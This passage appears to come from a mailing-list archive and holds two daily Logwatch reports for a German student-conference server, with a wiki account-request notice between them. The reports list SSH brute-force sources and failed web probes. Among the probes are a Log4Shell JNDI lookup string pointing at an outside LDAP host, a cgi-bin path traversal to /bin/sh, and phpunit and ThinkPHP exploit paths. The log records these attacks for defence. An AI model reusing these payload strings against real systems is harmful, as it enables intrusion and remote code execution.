Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Tue Jan 4 04:42:04 2022
Date Range Processed: yesterday
( 2022-Jan-03 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 31:32 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
222.186.19.235 -> zapf.wiki:443: 2 Time(s)
223.166.75.150 -> zapf.wiki:443: 1 Time(s)
A total of 5 sites probed the server
167.71.102.181
193.142.58.22
207.46.139.2
222.186.19.235
64.227.97.195
Requests with error response codes
400 Bad Request
null: 13 Time(s)
/phpmyadmin/scripts/setup.php: 4 Time(s)
zapf.wiki:443: 3 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 1 Time(s)
/config/getuser?index=0: 1 Time(s)
/manager/html: 1 Time(s)
/sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/: 1 Time(s)
404 Not Found
//2018/wp-includes/wlwmanifest.xml: 1 Time(s)
//2019/wp-includes/wlwmanifest.xml: 1 Time(s)
//blog/wp-includes/wlwmanifest.xml: 1 Time(s)
//cms/wp-includes/wlwmanifest.xml: 1 Time(s)
//media/wp-includes/wlwmanifest.xml: 1 Time(s)
//news/wp-includes/wlwmanifest.xml: 1 Time(s)
//shop/wp-includes/wlwmanifest.xml: 1 Time(s)
//site/wp-includes/wlwmanifest.xml: 1 Time(s)
//sito/wp-includes/wlwmanifest.xml: 1 Time(s)
//test/wp-includes/wlwmanifest.xml: 1 Time(s)
//web/wp-includes/wlwmanifest.xml: 1 Time(s)
//website/wp-includes/wlwmanifest.xml: 1 Time(s)
//wordpress/wp-includes/wlwmanifest.xml: 1 Time(s)
//wp-includes/wlwmanifest.xml: 1 Time(s)
//wp/wp-includes/wlwmanifest.xml: 1 Time(s)
//wp1/wp-includes/wlwmanifest.xml: 1 Time(s)
//wp2/wp-includes/wlwmanifest.xml: 1 Time(s)
//xmlrpc.php?rsd: 1 Time(s)
499 (undefined)
/: 1 Time(s)
/${jndi:ldap://121.140.99.236:1389/Exploit}: 1 Time(s)
500 Internal Server Error
/: 13 Time(s)
/.env: 3 Time(s)
/_ignition/execute-solution: 2 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s)
/Autodiscover/Autodiscover.xml: 1 Time(s)
/actuator/health: 1 Time(s)
/console/: 1 Time(s)
/mifs/.;/services/LogService: 1 Time(s)
/owa/: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
/solr/: 1 Time(s)
502 Bad Gateway
/rHu6N32pQtmByz067anNsw/pdf: 1 Time(s)
/socket.io/?noteId=siegen17&EIO=3&transpor ... lling&t=NuU7ILn: 1 Time(s)
/socket.io/?noteId=siegen17&EIO=3&transpor ... lling&t=NuU7Iba: 1 Time(s)
/socket.io/?noteId=siegen17&EIO=3&transpor ... lling&t=NuU7Irj: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (115.231.73.154): 40 Time(s)
root (139.155.35.47): 33 Time(s)
root (1.215.195.10): 30 Time(s)
root (163.172.90.164): 30 Time(s)
root (134.17.94.181): 27 Time(s)
unknown (1.215.195.10): 19 Time(s)
root (80.253.31.232): 16 Time(s)
unknown (139.155.35.47): 16 Time(s)
root (119.82.135.226): 15 Time(s)
root (222.190.254.130): 15 Time(s)
unknown (163.172.90.164): 15 Time(s)
unknown (171.39.0.3): 13 Time(s)
unknown (134.17.94.181): 11 Time(s)
unknown (115.231.73.154): 10 Time(s)
root (171.39.0.3): 8 Time(s)
unknown (80.253.31.232): 7 Time(s)
root (104.244.77.101): 6 Time(s)
root (107.189.30.23): 6 Time(s)
root (162.247.73.192): 6 Time(s)
root (185.220.101.152): 6 Time(s)
root (185.220.101.156): 6 Time(s)
root (198.98.59.35): 6 Time(s)
root (81.17.18.59): 6 Time(s)
root (82.221.131.71): 6 Time(s)
root (realitywinner.tor-exit.calyxinstitute.org): 6 Time(s)
root (turing.tor-exit.calyxinstitute.org): 6 Time(s)
root (106.51.80.198): 5 Time(s)
root (111.93.214.67): 5 Time(s)
unknown (119.82.135.226): 5 Time(s)
unknown (222.190.254.130): 5 Time(s)
root (49.247.198.162): 4 Time(s)
unknown (106.51.80.198): 4 Time(s)
root (111.161.74.118): 3 Time(s)
unknown (111.93.214.67): 3 Time(s)
root (103.142.73.254): 2 Time(s)
root (116.196.122.196): 2 Time(s)
root (120.236.114.195): 2 Time(s)
root (128.199.123.0): 2 Time(s)
root (153.35.93.67): 2 Time(s)
unknown (116.196.122.196): 2 Time(s)
unknown (128.199.123.0): 2 Time(s)
unknown (153.35.93.67): 2 Time(s)
unknown (178.213.248.102): 2 Time(s)
unknown (65.78.98.124): 2 Time(s)
postfix (1.215.195.10): 1 Time(s)
root (1.234.79.66): 1 Time(s)
root (103.18.244.163): 1 Time(s)
root (103.94.129.17): 1 Time(s)
root (104.131.93.33): 1 Time(s)
root (104.236.33.82): 1 Time(s)
root (104.248.156.251): 1 Time(s)
root (104.248.181.156): 1 Time(s)
root (106.246.224.154): 1 Time(s)
root (107.170.172.23): 1 Time(s)
root (107.170.212.116): 1 Time(s)
root (114-32-60-157.hinet-ip.hinet.net): 1 Time(s)
root (114.141.160.121): 1 Time(s)
root (115.143.107.221): 1 Time(s)
root (118.45.190.167): 1 Time(s)
root (12.179.154.104.bc.googleusercontent.com): 1 Time(s)
root (120.202.128.225): 1 Time(s)
root (120.221.150.207): 1 Time(s)
root (120.236.114.196): 1 Time(s)
root (121.141.180.210): 1 Time(s)
root (122-19-235-201.fibertel.com.ar): 1 Time(s)
root (122.154.148.234): 1 Time(s)
root (123.209.109.158): 1 Time(s)
root (124.224.87.156): 1 Time(s)
root (124.232.165.117): 1 Time(s)
root (125-227-118-63.hinet-ip.hinet.net): 1 Time(s)
root (125-227-130-2.hinet-ip.hinet.net): 1 Time(s)
root (128.199.127.217): 1 Time(s)
root (128.199.81.8): 1 Time(s)
root (13.71.2.244): 1 Time(s)
root (134.17.5.99): 1 Time(s)
root (138.0.219.63): 1 Time(s)
root (139.59.59.187): 1 Time(s)
root (14.102.154.66): 1 Time(s)
root (14.225.3.47): 1 Time(s)
root (142.93.122.58): 1 Time(s)
root (148.233.136.34): 1 Time(s)
root (152.32.76.186): 1 Time(s)
root (159.65.144.233): 1 Time(s)
root (159.65.65.54): 1 Time(s)
root (161.132.96.90): 1 Time(s)
root (162.222.212.46): 1 Time(s)
root (162.241.201.224): 1 Time(s)
root (165.22.233.236): 1 Time(s)
root (167.71.166.101): 1 Time(s)
root (167.71.166.90): 1 Time(s)
root (168.228.220.252): 1 Time(s)
root (170.80.65.33): 1 Time(s)
root (171.13.138.242): 1 Time(s)
root (171.88.165.238): 1 Time(s)
root (175.209.89.234): 1 Time(s)
root (177.182.217.251): 1 Time(s)
root (177.94.220.152): 1 Time(s)
root (177.95.36.21): 1 Time(s)
root (178.128.33.227): 1 Time(s)
root (179.83.128.81): 1 Time(s)
root (180-150-103-131.b49667.bne.static.aussiebb.net): 1 Time(s)
root (181.228.204.71): 1 Time(s)
root (181.48.46.195): 1 Time(s)
root (183.101.208.60): 1 Time(s)
root (186.16.210.34): 1 Time(s)
root (186.16.42.74): 1 Time(s)
root (186.233.166.214): 1 Time(s)
root (186.67.150.170): 1 Time(s)
root (187-109-1-120.sempre.tec.br): 1 Time(s)
root (187-109-13-13.sempre.tec.br): 1 Time(s)
root (187-86-249-49.vespanet.com.br): 1 Time(s)
root (188.124.47.115): 1 Time(s)
root (188.75.134.126): 1 Time(s)
root (189.39.17.163): 1 Time(s)
root (189.79.242.92): 1 Time(s)
root (190.107.162.132): 1 Time(s)
root (190.107.162.136): 1 Time(s)
root (190.205.35.66): 1 Time(s)
root (190.61.31.205): 1 Time(s)
root (191-217-201-66.user3p.brasiltelecom.net.br): 1 Time(s)
root (192.210.215.108): 1 Time(s)
root (193.112.248.85): 1 Time(s)
root (193.192.176.90): 1 Time(s)
root (194.124.39.254): 1 Time(s)
root (194.44.128.186): 1 Time(s)
root (195.158.16.60): 1 Time(s)
root (195.200.160.182): 1 Time(s)
root (196.203.182.166): 1 Time(s)
root (198.199.66.10): 1 Time(s)
root (198.199.69.35): 1 Time(s)
root (20-213-165-66.rev.knet.ca): 1 Time(s)
root (200-171-246-80.customer.telesp.net.br): 1 Time(s)
root (200.146.222.250): 1 Time(s)
root (200.27.178.122): 1 Time(s)
root (201.140.123.130): 1 Time(s)
root (202.129.16.124): 1 Time(s)
root (202.147.206.86): 1 Time(s)
root (202.88.241.107): 1 Time(s)
root (203.154.243.50): 1 Time(s)
root (204.48.17.13): 1 Time(s)
root (206.189.136.160): 1 Time(s)
root (210-65-10-144.hinet-ip.hinet.net): 1 Time(s)
root (210.175.43.18): 1 Time(s)
root (211.167.230.42): 1 Time(s)
root (211.253.9.160): 1 Time(s)
root (212.164.218.254): 1 Time(s)
root (213.192.73.62): 1 Time(s)
root (213.27.38.5): 1 Time(s)
root (213.32.75.23): 1 Time(s)
root (216.119.106.244): 1 Time(s)
root (219.240.46.157): 1 Time(s)
root (220.86.70.144): 1 Time(s)
root (222.112.0.197): 1 Time(s)
root (222.186.153.230): 1 Time(s)
root (222.239.78.88): 1 Time(s)
root (222.89.21.254): 1 Time(s)
root (27.154.242.142): 1 Time(s)
root (31.130.182.15): 1 Time(s)
root (37.230.163.160): 1 Time(s)
root (37.252.70.69): 1 Time(s)
root (42.113.207.190): 1 Time(s)
root (43.229.225.236): 1 Time(s)
root (45.115.179.146): 1 Time(s)
root (45.186.248.102): 1 Time(s)
root (45.239.155.27): 1 Time(s)
root (45.55.75.215): 1 Time(s)
root (45.84.186.138): 1 Time(s)
root (46.101.1.131): 1 Time(s)
root (49.209.37.185.rev.vodafone.pt): 1 Time(s)
root (58.151.80.76): 1 Time(s)
root (58.227.42.130): 1 Time(s)
root (59.12.54.116): 1 Time(s)
root (60.209.105.178): 1 Time(s)
root (61-220-44-44.hinet-ip.hinet.net): 1 Time(s)
root (61.164.170.242): 1 Time(s)
root (61.85.178.168): 1 Time(s)
root (64.227.32.97): 1 Time(s)
root (80.92.231.239): 1 Time(s)
root (80.92.232.39): 1 Time(s)
root (81.22.233.170): 1 Time(s)
root (82.223.32.38): 1 Time(s)
root (84-255-199-39.static.t-2.net): 1 Time(s)
root (85.184.70.58): 1 Time(s)
root (88.26.249.12): 1 Time(s)
root (89-171-167-126.static.ip.netia.com.pl): 1 Time(s)
root (89-24-118-214.customers.tmcz.cz): 1 Time(s)
root (89.151.134.90): 1 Time(s)
root (89.203.221.115): 1 Time(s)
root (89.228.59.72): 1 Time(s)
root (91.223.48.11): 1 Time(s)
root (92.246.16.39): 1 Time(s)
root (92.62.131.124): 1 Time(s)
root (93-63-37-231.ip25.fastwebnet.it): 1 Time(s)
root (93.100.138.129): 1 Time(s)
root (96-68-199-2-static.hfc.comcastbusiness.net): 1 Time(s)
root (99-49-113-151.lightspeed.snjsca.sbcglobal.net): 1 Time(s)
root (a4burada.com): 1 Time(s)
root (c160-242.icpnet.pl): 1 Time(s)
root (catv-89-134-150-241.catv.broadband.hu): 1 Time(s)
root (crushdigital.co.uk): 1 Time(s)
root (eoy180.internetdsl.tpnet.pl): 1 Time(s)
root (gw.ivk.hu): 1 Time(s)
root (hkws.org): 1 Time(s)
root (host-157-20.pool.itplus.kiev.ua): 1 Time(s)
root (host-79-10-159-73.business.telecomitalia.it): 1 Time(s)
root (ik1-304-12418.vs.sakura.ne.jp): 1 Time(s)
root (ik1-338-29413.vs.sakura.ne.jp): 1 Time(s)
root (mx1.infogenie.cm): 1 Time(s)
root (nat-intranet.sssup.it): 1 Time(s)
root (net-109-117-33-132.cust.vodafonedsl.it): 1 Time(s)
root (net-109-117-40-169.cust.vodafonedsl.it): 1 Time(s)
root (net-37-119-61-176.cust.vodafonedsl.it): 1 Time(s)
root (office.systemfox.com): 1 Time(s)
root (ool-6c3a117a.static.optonline.net): 1 Time(s)
root (pc-201-15-46-190.cm.vtr.net): 1 Time(s)
root (port-92-198-28-38.static.as20676.net): 1 Time(s)
root (ppp91-122-191-82.pppoe.avangarddsl.ru): 1 Time(s)
root (srv-4gym-tripol.ark.sch.gr): 1 Time(s)
root (static-173-70-102-222.nwrknj.fios.verizon.net): 1 Time(s)
root (static-71-246-219-91.washdc.fios.verizon.net): 1 Time(s)
root (tk2-229-24085.vs.sakura.ne.jp): 1 Time(s)
root (uranus.onat.edu.ua): 1 Time(s)
root (user.bnet.id): 1 Time(s)
root (v118-27-13-161.k6mg.static.cnode.io): 1 Time(s)
root (vmi148888.contaboserver.net): 1 Time(s)
root (webapp-phy.uct.ac.za): 1 Time(s)
root (www.speedline.net.br): 1 Time(s)
unknown (103.142.73.254): 1 Time(s)
unknown (185.90.136.196): 1 Time(s)
unknown (186.16.210.34): 1 Time(s)
unknown (209.141.46.251): 1 Time(s)
unknown (31.184.198.71): 1 Time(s)
unknown (49.247.198.162): 1 Time(s)
unknown (92.255.85.135): 1 Time(s)
Invalid Users:
Unknown Account: 125 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
9.992K Bytes accepted 10,232
9.992K Bytes sent via SMTP 10,232
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
4 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
4 Total 4xx Rejects 100.00%
======== ==================================================
162 Connections
19 Connections lost (inbound)
162 Disconnections
1 Removed from queue
1 Sent via SMTP
38 Timeouts (inbound)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Disconnecting after too many authentication failures for user:
root : 10 Time(s)
Failed logins from:
1.215.195.10: 31 times
1.234.79.66: 1 time
5.189.141.104 (vmi148888.contaboserver.net): 1 time
13.71.2.244: 1 time
14.102.154.66 (BSP-Server.skyline.net.id): 1 time
14.225.3.47: 1 time
27.154.242.142: 1 time
31.130.182.15: 1 time
37.119.61.176 (net-37-119-61-176.cust.vodafonedsl.it): 1 time
37.230.163.160 (37.230.163.160.leadertelecom.ru): 1 time
37.252.70.69 (host-69.70.252.37.ucom.am): 1 time
42.113.207.190: 1 time
43.229.225.236: 1 time
45.55.75.215: 1 time
45.84.186.138 (host1868445138.burgasnet.com): 1 time
45.115.179.146 (axntech-dynamic-146.179.115.45.axntechnologies.in): 1 time
45.186.248.102 (intranet.sementesestrela.com.br): 1 time
45.239.155.19 (www.speedline.net.br): 1 time
45.239.155.27 (45-239-155-27.speedline.net.br): 1 time
46.101.1.131: 1 time
46.101.88.10 (crushdigital.co.uk): 1 time
49.247.198.162: 4 times
58.151.80.76: 1 time
58.227.42.130: 1 time
59.12.54.116: 1 time
60.209.105.178: 1 time
61.85.178.168: 1 time
61.164.170.242: 1 time
61.220.44.44 (61-220-44-44.hinet-ip.hinet.net): 1 time
62.77.195.21 (office.systemfox.com): 1 time
64.227.32.97: 1 time
66.165.213.20 (20-213-165-66.rev.knet.ca): 1 time
71.246.219.91 (static-71-246-219-91.washdc.fios.verizon.net): 1 time
79.10.159.73 (host-79-10-159-73.business.telecomitalia.it): 1 time
80.92.231.239 (239.unassigned.unlimited.ua): 1 time
80.92.232.39: 1 time
80.253.31.232: 16 times
81.17.18.59 (block1-che.interlayer.co.uk): 6 times
81.22.233.170: 1 time
81.186.69.13 (srv-4gym-tripol.ark.sch.gr): 1 time
82.221.131.71: 6 times
82.223.32.38: 1 time
83.15.236.180 (eoy180.internetdsl.tpnet.pl): 1 time
84.255.199.39 (84-255-199-39.static.t-2.net): 1 time
85.184.70.58: 1 time
85.221.160.242 (c160-242.icpnet.pl): 1 time
88.26.249.12 (dns1.nsmontserrat.cat): 1 time
89.24.118.214 (89-24-118-214.customers.tmcz.cz): 1 time
89.134.150.241 (catv-89-134-150-241.catv.broadband.hu): 1 time
89.151.134.90 (090.134.151.89.chtts.ru): 1 time
89.171.167.126 (89-171-167-126.static.ip.netia.com.pl): 1 time
89.203.221.115: 1 time
89.228.59.72 (host-89-228-59-72.dynamic.mm.pl): 1 time
91.122.191.82 (ppp91-122-191-82.pppoe.avangarddsl.ru): 1 time
91.223.48.11: 1 time
91.224.157.20 (host-157-20.pool.itplus.kiev.ua): 1 time
92.62.131.124: 1 time
92.198.28.38 (port-92-198-28-38.static.as20676.net): 1 time
92.246.16.39: 1 time
93.63.37.231 (93-63-37-231.ip25.fastwebnet.it): 1 time
93.100.138.129 (mail.madon.ru): 1 time
96.68.199.2 (96-68-199-2-static.hfc.comcastbusiness.net): 1 time
99.49.113.151 (99-49-113-151.lightspeed.snjsca.sbcglobal.net): 1 time
103.18.244.163: 1 time
103.73.73.66 (user.bnet.id): 1 time
103.94.129.17: 1 time
103.142.73.254 (ns1.netzy.in): 2 times
104.131.93.33 (mcp.org.py): 1 time
104.154.179.12 (12.179.154.104.bc.googleusercontent.com): 1 time
104.236.33.82: 1 time
104.244.77.101 (LuxembourgTor8.lu): 6 times
104.248.156.251: 1 time
104.248.181.156: 1 time
106.51.80.198 (106.51.80.198.actcorp.in): 5 times
106.246.224.154: 1 time
107.170.172.23 (www.thethinktankers.in): 1 time
107.170.212.116: 1 time
107.189.30.23 (LuxembourgTor13.lu): 6 times
108.58.17.122 (ool-6c3a117a.static.optonline.net): 1 time
109.117.33.132 (net-109-117-33-132.cust.vodafonedsl.it): 1 time
109.117.40.169 (net-109-117-40-169.cust.vodafonedsl.it): 1 time
111.93.214.67 (static-67.214.93.111-tataidc.co.in): 5 times
111.161.74.118 (dns118.online.tj.cn): 3 times
114.32.60.157 (114-32-60-157.hinet-ip.hinet.net): 1 time
114.141.160.121: 1 time
115.143.107.221: 1 time
115.231.73.154: 40 times
116.196.122.196: 2 times
118.27.13.161 (v118-27-13-161.k6mg.static.cnode.io): 1 time
118.45.190.167: 1 time
119.82.135.226 (static.cmcti.vn): 15 times
120.202.128.225: 1 time
120.221.150.207: 1 time
120.236.114.195: 2 times
120.236.114.196: 1 time
121.141.180.210: 1 time
122.154.148.234: 1 time
123.209.109.158: 1 time
124.224.87.156: 1 time
124.232.165.117: 1 time
125.227.118.63 (125-227-118-63.hinet-ip.hinet.net): 1 time
125.227.130.2 (125-227-130-2.hinet-ip.hinet.net): 1 time
128.199.81.8: 1 time
128.199.123.0: 2 times
128.199.127.217: 1 time
128.199.229.17 (hkws.org): 1 time
134.17.5.99 (99-5-17-134-dynamic-pool.internet.mts.by): 1 time
134.17.94.181 (181-94-17-134-cloud.mts.by): 27 times
137.158.92.197 (webapp-phy.uct.ac.za): 1 time
138.0.219.63: 1 time
139.59.59.187: 1 time
139.155.35.47: 33 times
142.93.122.58: 1 time
148.233.136.34 (customer-148-233-136-34.uninet-ide.com.mx): 1 time
152.32.76.186 (186.76.32.152.convergeict.com): 1 time
153.35.93.67: 2 times
153.126.137.172 (ik1-304-12418.vs.sakura.ne.jp): 1 time
153.126.205.167 (ik1-338-29413.vs.sakura.ne.jp): 1 time
159.65.65.54: 1 time
159.65.144.233: 1 time
160.16.106.89 (tk2-229-24085.vs.sakura.ne.jp): 1 time
161.132.96.90: 1 time
162.222.212.46: 1 time
162.241.201.224 (162-241-201-224.unifiedlayer.com): 1 time
162.247.73.192 (mario-louis-sylvester-lap.tor-exit.calyxinstitute.org): 6 times
162.247.74.27 (turing.tor-exit.calyxinstitute.org): 6 times
163.172.90.164 (163-172-90-164.rev.poneytelecom.eu): 30 times
165.22.233.236: 1 time
167.71.166.90: 1 time
167.71.166.101: 1 time
168.228.220.252: 1 time
170.80.65.33: 1 time
171.13.138.242: 1 time
171.39.0.3: 8 times
171.88.165.238: 1 time
173.70.102.222 (static-173-70-102-222.nwrknj.fios.verizon.net): 1 time
175.209.89.234: 1 time
177.94.220.152 (177-94-220-152.dsl.telesp.net.br): 1 time
177.95.36.21 (177-95-36-21.dsl.telesp.net.br): 1 time
177.182.217.251 (b1b6d9fb.virtua.com.br): 1 time
178.128.33.227: 1 time
179.83.128.81 (179.83.128.81.static.gvt.net.br): 1 time
180.150.103.131 (180-150-103-131.b49667.bne.static.aussiebb.net): 1 time
181.48.46.195: 1 time
181.228.204.71 (71-204-228-181.cab.prima.com.ar): 1 time
183.101.208.60: 1 time
185.37.209.49 (49.209.37.185.rev.vodafone.pt): 1 time
185.220.101.152 (tor-exit-152.relayon.org): 6 times
185.220.101.156 (tor-exit-156.relayon.org): 6 times
185.220.103.4 (realitywinner.tor-exit.calyxinstitute.org): 6 times
186.16.42.74 (static-74-42-16-186.telecel.com.py): 1 time
186.16.210.34 (pool-34-210-16-186.telecel.com.py): 1 time
186.67.150.170: 1 time
186.233.166.214 (187-233-166-214.supercabotv.com.br): 1 time
187.86.249.49 (187-86-249-49.vespanet.com.br): 1 time
187.109.1.120 (187-109-1-120.sempre.tec.br): 1 time
187.109.13.13 (187-109-13-13.sempre.tec.br): 1 time
188.75.134.126 (126-134-75-188.jon.cz): 1 time
188.124.47.115: 1 time
188.166.34.234 (a4burada.com): 1 time
189.39.17.163 (189-039-017-163.static.spo.ctbc.com.br): 1 time
189.79.242.92 (189-79-242-92.dsl.telesp.net.br): 1 time
190.46.15.201 (pc-201-15-46-190.cm.vtr.net): 1 time
190.61.31.205 (205.31.61.190.static.host.ifxnetworks.com): 1 time
190.107.162.132 (190-107-162-132.levefibra.net.br): 1 time
190.107.162.136 (190-107-162-136.levefibra.net.br): 1 time
190.205.35.66 (190.205.35.66.estatic.cantv.net): 1 time
191.217.201.66 (191-217-201-66.user3p.brasiltelecom.net.br): 1 time
192.210.215.108 (192-210-215-108-host.colocrossing.com): 1 time
193.112.248.85: 1 time
193.186.15.8 (uranus.onat.edu.ua): 1 time
193.192.176.90 (hostA90.stimo.net): 1 time
193.205.81.21 (nat-intranet.sssup.it): 1 time
193.225.104.171 (gw.ivk.hu): 1 time
194.44.128.186: 1 time
194.124.39.254: 1 time
195.24.199.124 (mx1.infogenie.cm): 1 time
195.158.16.60: 1 time
195.200.160.182 (182-160-static.pacwan.net): 1 time
196.203.182.166 (clinique-larose.com): 1 time
198.98.59.35 (NewYorkTor12.us): 6 times
198.199.66.10: 1 time
198.199.69.35 (kejun.shiyuan.test.wiki): 1 time
200.27.178.122: 1 time
200.146.222.250 (200-146-222-250.static.ctbctelecom.com.br): 1 time
200.171.246.80 (200-171-246-80.customer.telesp.net.br): 1 time
201.140.123.130 (toro.itapizaco.edu.mx): 1 time
201.235.19.122 (122-19-235-201.fibertel.com.ar): 1 time
202.88.241.107 (107.241.88.202.asianet.co.in): 1 time
202.129.16.124: 1 time
202.147.206.86 (ip-206-86.mncplaymedia.com): 1 time
203.154.243.50 (203-154-243-50.inter.net.th): 1 time
204.48.17.13: 1 time
206.189.136.160: 1 time
210.65.10.144 (210-65-10-144.hinet-ip.hinet.net): 1 time
210.175.43.18 (18.43.175.210.in-addr.arpa): 1 time
211.167.230.42: 1 time
211.253.9.160: 1 time
212.164.218.254: 1 time
213.27.38.5: 1 time
213.32.75.23 (ip-213-32-75.eu): 1 time
213.192.73.62: 1 time
216.119.106.244: 1 time
219.240.46.157: 1 time
220.86.70.144: 1 time
222.89.21.254: 1 time
222.112.0.197: 1 time
222.186.153.230: 1 time
222.190.254.130: 15 times
222.239.78.88 (222-239-78-88.youiwe.co.kr): 1 time
Illegal users from:
2001:470:1:332::7: 1 time
undef: 102 times
1.215.195.10: 19 times
31.184.198.71: 1 time
49.247.198.162: 1 time
64.62.197.92: 1 time
65.78.98.124 (65-78-98-124.s4730.c3-0.smt-ubr1.atw-smt.pa.cable.rcncustomer.com): 2 times
80.253.31.232: 7 times
92.255.85.135: 2 times
103.142.73.254 (ns1.netzy.in): 1 time
106.51.80.198 (106.51.80.198.actcorp.in): 4 times
111.93.214.67 (static-67.214.93.111-tataidc.co.in): 3 times
115.231.73.154: 10 times
116.196.122.196: 2 times
119.82.135.226 (static.cmcti.vn): 5 times
128.199.123.0: 2 times
134.17.94.181 (181-94-17-134-cloud.mts.by): 11 times
139.155.35.47: 16 times
153.35.93.67: 2 times
163.172.90.164 (163-172-90-164.rev.poneytelecom.eu): 15 times
171.39.0.3: 13 times
178.213.248.102: 2 times
185.90.136.196 (shadetalk.net): 1 time
186.16.210.34 (pool-34-210-16-186.telecel.com.py): 1 time
209.141.46.251: 1 time
222.190.254.130: 5 times
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
3 Jahre, 9 Monate
- 1
- 0
[Studienfuehrer] Antrag auf Benutzerkonto
by Studienfuehrer
FS Physik UUlm hat ein Benutzerkonto beantragt und wartet auf die Bestätigung.
Die E-Mail-Adresse wurde bestätigt. Du kannst den Antrag hier bestätigen:
https://xn--studienfhrer-physik-dbc.de/Spezial:Benutzerkonto_best%C3%A4tigen
3 Jahre, 9 Monate
- 1
- 0
Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Mon Jan 3 04:42:04 2022
Date Range Processed: yesterday
( 2022-Jan-02 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 19:18 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
34.86.55.141 -> 161.97.119.209:7144: 1 Time(s)
92.118.234.202 -> zapf.wiki:443: 5 Time(s)
A total of 8 sites probed the server
145.239.154.82
145.239.154.84
159.223.66.215
165.22.239.78
172.104.140.107
185.44.81.176
193.37.255.114
46.101.229.75
Requests with error response codes
400 Bad Request
null: 15 Time(s)
zapf.wiki:443: 5 Time(s)
/: 4 Time(s)
mstshash=Domain: 4 Time(s)
/phpmyadmin/scripts/setup.php: 3 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 2 Time(s)
default.asp: 2 Time(s)
/.env: 1 Time(s)
/.git/config: 1 Time(s)
/ab2g: 1 Time(s)
/ab2h: 1 Time(s)
/admin/config.php: 1 Time(s)
/bag2: 1 Time(s)
/favicon.ico: 1 Time(s)
/manager/text/list: 1 Time(s)
/sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/: 1 Time(s)
161.97.119.209:7144: 1 Time(s)
7: 1 Time(s)
mstshash=Administr: 1 Time(s)
404 Not Found
/: 1 Time(s)
/berlin/bower_components/scrollmagic/scrol ... ollmagic.min.js: 1 Time(s)
/konstanz/2016/tagung/impressum.html: 1 Time(s)
/konstanz/2016/tagung/index.html: 1 Time(s)
/konstanz/2016/tagung/unterstuetzer/Sponsoren.html: 1 Time(s)
/konstanz/2016/unterstuetzer/impressum.html: 1 Time(s)
/konstanz/2016/unterstuetzer/index.html: 1 Time(s)
/konstanz/2016/unterstuetzer/tagung/programm.html: 1 Time(s)
/konstanz/2016/unterstuetzer/willkommen/wasistdiezapf.html: 1 Time(s)
/konstanz/2016/unterstuetzer/willkommen/wersindwir.html: 1 Time(s)
/konstanz/2016/unterstuetzer/willkommen/willkommen.html: 1 Time(s)
/konstanz/2016/willkommen/impressum.html: 1 Time(s)
/konstanz/2016/willkommen/index.html: 1 Time(s)
/konstanz/2016/willkommen/tagung/programm.html: 1 Time(s)
/konstanz/2016/willkommen/unterstuetzer/Sponsoren.html: 1 Time(s)
500 Internal Server Error
/: 25 Time(s)
/.git/HEAD: 6 Time(s)
/robots.txt: 6 Time(s)
/.env: 5 Time(s)
/.git/config: 2 Time(s)
/?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB: 2 Time(s)
/console/: 2 Time(s)
/dns-query: 2 Time(s)
/dns-query?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB: 2 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
/query: 2 Time(s)
/query?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB: 2 Time(s)
/resolve: 2 Time(s)
/resolve?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB: 2 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s)
/./RestAPI/LogonCustomization: 1 Time(s)
/.well-known/security.txt: 1 Time(s)
/?XDEBUG_SESSION_START=phpstorm: 1 Time(s)
/Autodiscover/Autodiscover.xml: 1 Time(s)
/HNAP1/: 1 Time(s)
/actuator/health: 1 Time(s)
/admin/index.php?login: 1 Time(s)
/favicon.ico: 1 Time(s)
/index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s)
/mifs/.;/services/LogService: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
